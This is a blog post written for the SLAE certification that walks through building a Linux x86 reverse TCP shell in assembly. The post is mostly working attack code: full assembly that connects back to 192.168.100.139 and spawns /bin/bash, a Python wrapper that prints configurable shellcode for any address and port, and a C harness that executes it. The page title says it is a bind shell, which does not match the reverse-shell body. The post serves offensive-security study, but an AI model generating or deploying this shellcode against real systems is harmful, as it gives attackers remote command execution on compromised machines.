<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.3.0" /><meta property="og:title" content="SLAE - Assignment 1 - Bind TCP Shellcode" /><meta name="author" content="fwinsnes" /><meta property="og:locale" content="en" /><meta name="description" content="Introduction" /><meta property="og:description" content="Introduction" /><link rel="canonical" href="https://whitecr0wz.github.io/posts/SLAE-Reverse/" /><meta property="og:url" content="https://whitecr0wz.github.io/posts/SLAE-Reverse/" /><meta property="og:site_name" content="Knowledge Library" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-14T05:44:00+00:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="SLAE - Assignment 1 - Bind TCP Shellcode" /><meta name="twitter:site" content="@whitecr0wz" /><meta name="twitter:creator" content="@fwinsnes" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"fwinsnes"},"dateModified":"2021-01-14T05:44:00+00:00","datePublished":"2021-01-14T05:44:00+00:00","description":"Introduction","headline":"SLAE - Assignment 1 - Bind TCP Shellcode","mainEntityOfPage":{"@type":"WebPage","@id":"https://whitecr0wz.github.io/posts/SLAE-Reverse/"},"url":"https://whitecr0wz.github.io/posts/SLAE-Reverse/"}</script><title>SLAE - Assignment 1 - Bind TCP Shellcode | Knowledge Library</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Knowledge Library"><meta name="application-name" content="Knowledge Library"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="https://whitecr0wz.github.io/assets/img/Felipe-Winsnes.jpeg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Knowledge Library</a></div><div class="site-subtitle font-italic">Just sharing interesting tech stuff :)</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://twitter.com/whitecr0wz" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>SLAE - Assignment 1 - Bind TCP Shellcode</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>SLAE - Assignment 1 - Bind TCP Shellcode</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1610603040" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Jan 14, 2021 </em> </span><div class="d-flex justify-content-between"> <span> By <em> Felipe Winsnes </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1929 words"> <em>10 min</em> read</span></div></div></div><div class="post-content"><h4 id="introduction"><span class="mr-2">Introduction</span><a href="#introduction" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>These series of posts starting with the prefix “Assignment” will be created in order to fulfill the requirements of the SLAE certification. Today we are going to have a close look at Linux Reverse Shells.</p><p>A Reverse shell is a form of malware which grants remote access to a system through a shell. However, it differentiates from its peer the Bind shell, arranging a specific connection on a trivial address, instead of binding to a local port of the compromised system.</p><p>The second assignment from the seven requires the creation of a Reverse Shell through the Assembly language, and converting such into <a href="https://es.wikipedia.org/wiki/Shellcode">shellcode</a>. Moreover, it is required to write a wrapper in any language of preference that is capable of easily configuring the address and port.</p><p>If you were able to follow the previous post with ease, this should be a charm!</p><h4 id="theory"><span class="mr-2">Theory</span><a href="#theory" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>In order to create a Reverse Shell, 4 main functions are required:</p><ul><li><p>Socket</p><li><p>Connect</p><li><p>Dup2</p><li><p>Execve</p></ul><h4 id="time-to-stick-our-hands-into-the-mud"><span class="mr-2">Time to stick our hands into the mud</span><a href="#time-to-stick-our-hands-into-the-mud" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>The first thing required is to clean the registers, as when we execute our program, it will work as a charm. Nevertheless, when introduced into a real program, within a context of binary exploitation, with different variables that modify the registers, it may not. Due to this, it’s better to have a set of instructions that clean the registers that will be employed:</p><pre><code class="language-term">global _start

section .text

_start:

      xor eax, eax            ; Zeroes out EAX.
      xor ebx, ebx            ; Zeroes out EBX.
      xor ecx, ecx            ; Zeroes out ECX.
      xor edx, edx            ; Zeroes out EDX.
</code></pre><h5 id="socket"><span class="mr-2">Socket</span><a href="#socket" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5><h6 id="creates-an-endpoint-for-communication">Creates an endpoint for communication</h6><p>Our next step is to initialize the socket. In order to concrete such action, it is required to move the value of the socket (359) syscall into eax. I have chosen to push the value as a word into the ax register, in order to avoid null characters. Furthermore, according to the syscall man page for socket, the required flags involve domain (EBX), type (ECX) and protocol (EDX). A common combination when it comes to remote shells is AF_INET, SOCK_STREAM. According to <a href="https://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html">this file</a>, the value of AF_INET is 2 and SOCK_STREAM 1, therefore, this will be reflected on the EBX and ECX registers. Finally, the value of protocol (EDX) isn’t actually very relevant. Due to this, EDX is simply pushed.</p><pre><code class="language-term">      push word 359           ; Pushes word 359 (socket) into the stack.
      pop ax                  ; Pops such word into ax so there are no nulls.
      mov bl, 2               ; Moves value 2 into bl, giving the value AF_INET.
      mov cl, 1               ; Moves value 1 into bl, giving the value SOCK_STREAM.
      push edx                ; There isn't anything really needed within this parameter, so 0 is pushed from EDX.
      int 0x80                ; Call to kernel.
      mov esi, eax            ; Saves the value of eax for sockfd values later on.
</code></pre><p>As explained on the previous post, we can see that the value of EAX is being saved on ESI, this will be from great help when referring to the socket syscall as a file descriptor.</p><h5 id="connect"><span class="mr-2">Connect</span><a href="#connect" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5><h6 id="initiate-a-connection-on-a-socket">Initiate a connection on a socket</h6><p>The following step is to initiate a connection on the socket. The arguments according the man page are the following: <code class="language-plaintext highlighter-rouge">int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);</code>. As you may see, the required flags are quite the same to the bind syscall in the previous post. Nonetheless, if you remember, in the previous post a value of 0 was pushed within the IP protocol argument, value which will be essential this time, therefore, the order will be the following:</p><ul><li>0 (As it is required to push 0, the instruction PUSH EDX will be used.)<li>IP Address (As this is a reverse shell, it is required to point to a specific address. Due to the aforementioned, this will be set to our IP within hex.)<li>Chosen Port (The chosen port will be pushed in hex as a word.)<li>AF_INET</ul><p>Furthermore, we have to satisfy the socklen_t addrlen argument as well. This requires the length of the previous struct, as like in the previous chapter, it was 16 (any value above this could be used as well) . This will be reflected upon the value of DL.</p><h6 id="syscall-value">Syscall value:</h6><pre><code class="language-term">root@whitecr0wz:~# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep connect 
#define __NR_connect 362
root@whitecr0wz:~#
</code></pre><pre><code class="language-term">connect:

      push word 362           ; Pushes word 362 (connect) into the stack
      pop ax                  ; Pops such word into ax so there are no nulls.
      mov ebx, esi            ; Copies the value from ESI to EBX, granting EBX the sockfd value from the socket syscall.
      push edx                ; Pushes 0.
      push dword 0x8b64a8c0   ; Pushes 192.168.100.139 in hex as a DWORD.
      push word 0x2823        ; Pushes 9000 in hex as a WORD.
      push word 0x02          ; Pushes AF_INET into the stack.
      mov ecx, esp            ; Copies the value of ESP into ECX.
      mov dl, 30              ; The value 30 is inserted into DL. Anything above 16 can be used.
      int 0x80                ; Call to kernel.
</code></pre><h5 id="dup2"><span class="mr-2">Dup2</span><a href="#dup2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5><h6 id="duplicate-a-file-descriptor">Duplicate a file descriptor</h6><p>Once again, we encounter ourselves with our buddy Dup2. This syscall will make our communication with the compromised device interactive by duplicating the file descriptors STDIN (0), STDOUT (1), and STDERR (2) into our connection. Furthermore, as this requires that dup2 is iterated 3 times, a loop that is executed in such on three occasions will be implemented that performs such task as long as the zero flag (ZF) is not set.</p><h6 id="syscall-value-1">Syscall value:</h6><pre><code class="language-term">root@whitecr0wz:~# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep dup2
#define __NR_dup2 63
root@whitecr0wz:~#
</code></pre><h6 id="manpage-arguments-int-dup2int-oldfd-int-newfd">manpage arguments: <code class="language-plaintext highlighter-rouge">int dup2(int oldfd, int newfd);</code></h6><pre><code class="language-term">      xor ecx, ecx            ; Zeroes out ECX.
      mov cl, 0x3             ; Starts counter for dup2.

dup2:

      xor eax, eax            ; Zeroes out EAX.

      push word 63            ; Pushes word 63 (dup2) into the stack.
      pop ax                  ; Pops such word into ax so there are no nulls.
      mov ebx, esi            ; Copies the value from ESI to EBX, granting EBX the sockfd value from the socket syscall.
      dec cl                  ; Decrements cl in order to set the zero flag (ZF)
      int 0x80                ; Call to kernel.

      jnz dup2                ; Jump if the zero flag (ZF) is not set, this will continue the loop 3 times.
</code></pre><h5 id="execve"><span class="mr-2">Execve</span><a href="#execve" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5><h6 id="execute-program">Execute program</h6><p>Finally, the last syscall left to initialize is Execve, which will execute the program when the connection is stablished.</p><h6 id="syscall-value-2">Syscall value:</h6><pre><code class="language-term">root@whitecr0wz:~# cat /usr/include/x86_64-linux-gnu/asm/unistd_32.h | grep execve 
#define __NR_execve 11
#define __NR_execveat 358
root@whitecr0wz:~# 
</code></pre><h6 id="manpage-arguments">manpage arguments:</h6><pre><code class="language-term">int execve(const char *pathname, char *const argv[], char *const envp[]);
</code></pre><p>The procedure with this syscall will be the following:</p><ul><li>The program desired to execute will be /bin/bash.<li>The string “////bin/bash” (additional slashes in order to be divisible by 4) will be pushed into the stack and then saved into EBX.<li>EDX will be set to 0 as the value envp[] is not required.<li>EBX will be pushed and saved into ECX.<li>Execve will be called.</ul><pre><code class="language-term">execve:

      xor eax, eax            ; Zeroes out EAX.
      push eax                ; Pushes EAX (0x00000000).

      PUSH 0x68736162         ; hsab
      PUSH 0x2f6e6962         ; /nib
      PUSH 0x2f2f2f2f         ; ////

      mov ebx, esp            ; Copies the pushed instructions into EBX.
      push eax                ; Pushes EAX (0x00000000).

      mov edx, esp            ; Copies the value of ESP (0x00000000) into EDX, giving envp[] a value of 0.

      push ebx                ; Pushes ////bin/bash into the stack.
      mov ecx, esp            ; Copies such value to ECX.
      push word 11            ; Pushes word 11 (execve) into the stack.
      pop ax                  ; Pops such word into ax so there are no nulls.
      int 0x80                ; Calls to kernel.
</code></pre><p>Let’s test our shellcode.</p><p><img data-src="/assets/img/SLAE/SLAE32/Assignment_2/1.png" alt="" data-proofer-ignore></p><p>Wonderful!</p><p>Final Code:</p><pre><code class="language-term">global _start

section .text

_start:

      xor eax, eax            ; Zeroes out EAX.
      xor ebx, ebx            ; Zeroes out EBX.
      xor ecx, ecx            ; Zeroes out ECX.
      xor edx, edx            ; Zeroes out EDX.

      push word 359           ; Pushes word 359 (socket) into the stack.
      pop ax                  ; Pops such word into ax so there are no nulls.
      mov bl, 2               ; Moves value 2 into bl, giving the value AF_INET.
      mov cl, 1               ; Moves value 1 into bl, giving the value SOCK_STREAM.
      push edx                ; There isn't anything really needed within this parameter, so 0 is pushed from EDX.
      int 0x80                ; Call to kernel.
      mov esi, eax            ; Saves the value of eax for sockfd values later on.

connect:

      push word 362           ; Pushes word 362 (connect) into the stack
      pop ax                  ; Pops such word into ax so there are no nulls.
      mov ebx, esi            ; Copies the value from ESI to EBX, granting EBX the sockfd value from the socket syscall.
      push edx                ; Pushes 0.
      push dword 0x8b64a8c0   ; Pushes 192.168.100.139 in hex as a DWORD.
      push word 0x2823        ; Pushes 9000 in hex as a WORD.
      push word 0x02          ; Pushes AF_INET into the stack.
      mov ecx, esp            ; Copies the value of ESP into ECX.
      mov dl, 30              ; The value 30 is inserted into DL, anything above 16 can be used.
      int 0x80                ; Call to kernel.

      xor ecx, ecx            ; Zeroes out ECX.
      mov cl, 0x3             ; Starts counter for dup2.

dup2:

      xor eax, eax            ; Zeroes out EAX.

      push word 63            ; Pushes word 63 (dup2) into the stack.
      pop ax                  ; Pops such word into ax so there are no nulls.
      mov ebx, esi            ; Copies the value from ESI to EBX, granting EBX the sockfd value from the socket syscall.
      dec cl                  ; Decrements cl in order to set the zero flag (ZF)
      int 0x80                ; Call to kernel.

      jnz dup2                ; Jump if the zero flag (ZF) is not set, this will continue the loop 3 times.

execve:

      xor eax, eax            ; Zeroes out EAX.
      push eax                ; Pushes EAX (0x00000000).

      PUSH 0x68736162         ; hsab
      PUSH 0x2f6e6962         ; /nib
      PUSH 0x2f2f2f2f         ; ////

      mov ebx, esp            ; Copies the pushed instructions into EBX.
      push eax                ; Pushes EAX (0x00000000).

      mov edx, esp            ; Copies the value of ESP (0x00000000) into EDX, giving envp[] a value of 0.

      push ebx                ; Pushes ////bin/bash into the stack.
      mov ecx, esp            ; Copies such value to ECX.
      push word 11            ; Pushes word 11 (execve) into the stack.
      pop ax                  ; Pops such word into ax so there are no nulls.
      int 0x80                ; Calls to kernel.
</code></pre><h4 id="the-wrapper"><span class="mr-2">The Wrapper</span><a href="#the-wrapper" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>As stated in the introduction, one additional detail given in the assignment is to create a wrapper (in any language) that easily configures the address and port for the reverse shell.</p><p>Wrapper code:</p><pre><code class="language-term">import socket, sys, struct

if len(sys.argv) != 3:

      print "[*] Example: /usr/bin/python wrapper.py &lt;IP address&gt; &lt;port&gt;"
      sys.exit(1)

address = sys.argv[1]

address = address.split('.')
hexaddress = hex(int(address[0])) + hex(int(address[1])) + hex(int(address[2])) + hex(int(address[3]))
hexaddress = hexaddress.replace('0x', '')
hexaddress = hexaddress.upper()

final_address = "\\x"+"\\x".join(a+b for a,b in zip(hexaddress[::2],hexaddress[1::2]))

port = sys.argv[2]
port = int(port)
port = socket.htons(port)
hexport = hex(port)
hexport = struct.pack("&lt;H", port).encode("hex")

final_port = "\\x"+"\\x".join(a+b for a,b in zip(hexport[::2],hexport[1::2]))

buf = ("\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x66\\x68\\x67\\x01\\x66\\x58\\xb3"
"\\x02\\xb1\\x01\\x52\\xcd\\x80\\x89\\xc6\\x66\\x68\\x6a\\x01\\x66\\x58\\x89"
"\\xf3\\x52\\x68"
+ final_address +
"\\x66\\x68"
+ final_port +
"\\x66\\x6a\\x02\\x89"
"\\xe1\\xb2\\x1e\\xcd\\x80\\x31\\xc9\\xb1\\x03\\x31\\xc0\\x66\\x6a\\x3f\\x66"
"\\x58\\x89\\xf3\\xfe\\xc9\\xcd\\x80\\x75\\xf1\\x31\\xc0\\x50\\x68\\x62\\x61"
"\\x73\\x68\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x50"
"\\x89\\xe2\\x53\\x89\\xe1\\x66\\x6a\\x0b\\x66\\x58\\xcd\\x80")


print '"' + (buf) + '"'
</code></pre><h6 id="executing-the-wrapper">Executing the wrapper:</h6><pre><code class="language-term">whitecr0wz@SLAE:~/assembly/assignments/Assignment_2$ python wrapper.py 192.168.100.139 65434 
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\x68\x67\x01\x66\x58\xb3\x02\xb1\x01\x52\xcd\x80\x89\xc6\x66\x68\x6a\x01\x66\x58\x89\xf3\x52\x68\xC0\xA8\x64\x8B\x66\x68\xff\x9a\x66\x6a\x02
\x89\xe1\xb2\x1e\xcd\x80\x31\xc9\xb1\x03\x31\xc0\x66\x6a\x3f\x66\x58\x89\xf3\xfe\xc9\xcd\x80\x75\xf1\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\
xe3\x50\x89\xe2\x53\x89\xe1\x66\x6a\x0b\x66\x58\xcd\x80"
whitecr0wz@SLAE:~/assembly/assignments/Assignment_2$
</code></pre><p>Let’s test this on a C file to make sure that the shellcode could work on a real environment:</p><pre><code class="language-term">#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\x68\x67\x01\x66\x58\xb3\x02\xb1\x01\x52\xcd\x80\x89\xc6\x66\x68\x6a\x01\x66\x58\x89\xf3\x52\x68\xC0\xA8\x64\x8B\x66\x68\xff\x9a\x66\x6a\x02
\x89\xe1\xb2\x1e\xcd\x80\x31\xc9\xb1\x03\x31\xc0\x66\x6a\x3f\x66\x58\x89\xf3\xfe\xc9\xcd\x80\x75\xf1\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\
xe3\x50\x89\xe2\x53\x89\xe1\x66\x6a\x0b\x66\x58\xcd\x80"
;

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
</code></pre><h4 id="endgame"><span class="mr-2">EndGame</span><a href="#endgame" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p><img data-src="/assets/img/SLAE/SLAE32/Assignment_2/2.png" alt="" data-proofer-ignore></p><h3 id="code"><span class="mr-2">Code</span><a href="#code" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: <a href="http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/">http://securitytube-training.com/online- courses/securitytube-linux-assembly-expert/</a></p><p>Student ID: SLAE-27812/PA-27812</p><p>You can find all of the used resources within this post <a href="https://github.com/whitecr0wz/SLAE/tree/main/Assignment_2">here</a>.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/slae/'>SLAE</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/assembly/" class="post-tag no-text-decoration" >assembly</a> <a href="/tags/shellcoding/" class="post-tag no-text-decoration" >shellcoding</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"></div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=SLAE+-+Assignment+1+-+Bind+TCP+Shellcode+-+Knowledge+Library&url=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Reverse%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=SLAE+-+Assignment+1+-+Bind+TCP+Shellcode+-+Knowledge+Library&u=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Reverse%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Reverse%2F&text=SLAE+-+Assignment+1+-+Bind+TCP+Shellcode+-+Knowledge+Library" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/VyOS-OSPF-I/">VyOS - OSPF Basic Network</a><li><a href="/posts/Alignments-on-windows-registers/">Alignments on Windows Registers</a><li><a href="/posts/Vulnserver-LTER/">Vulnserver LTER - SEH Extremely restricted character set</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/networking/">Networking</a> <a class="post-tag" href="/tags/vyos/">VyOS</a> <a class="post-tag" href="/tags/ospf/">OSPF</a> <a class="post-tag" href="/tags/routing/">Routing</a> <a class="post-tag" href="/tags/soho/">SOHO</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/SLAE64-Egghunter/"><div class="card-body"> <em class="small" data-ts="1611467040" data-df="ll" > Jan 24, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 3 - Egghunter</h3><div class="text-muted small"><p> Introduction These series of posts starting with the prefix “SLAE64 - Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. Today we are going to have a clo...</p></div></div></a></div><div class="card"> <a href="/posts/SLAE64-Encoder/"><div class="card-body"> <em class="small" data-ts="1611553440" data-df="ll" > Jan 25, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 4 - Custom Insertion Encoder</h3><div class="text-muted small"><p> Introduction These series of posts starting with the prefix “Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. Today we are going to have a close look ...</p></div></div></a></div><div class="card"> <a href="/posts/SLAE64-Analyzing-Shellcode/"><div class="card-body"> <em class="small" data-ts="1611639840" data-df="ll" > Jan 26, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 5 - Analyzing 3rd party Shellcode</h3><div class="text-muted small"><p> These series of posts starting with the prefix “SLAE64 - Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. The fifth assignment from the seven requires ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Backdooring-PE-III/" class="btn btn-outline-primary" prompt="Older"><p>Beating ASLR & NX/DEP without PE Headers/Code Caves (VOL:III)</p></a> <a href="/posts/SLAE-Bind/" class="btn btn-outline-primary" prompt="Newer"><p>SLAE - Assignment 2 - Reverse TCP Shellcode</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://twitter.com/whitecr0wz">Felipe Winsnes</a>.</p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/networking/">Networking</a> <a class="post-tag" href="/tags/vyos/">VyOS</a> <a class="post-tag" href="/tags/ospf/">OSPF</a> <a class="post-tag" href="/tags/routing/">Routing</a> <a class="post-tag" href="/tags/soho/">SOHO</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
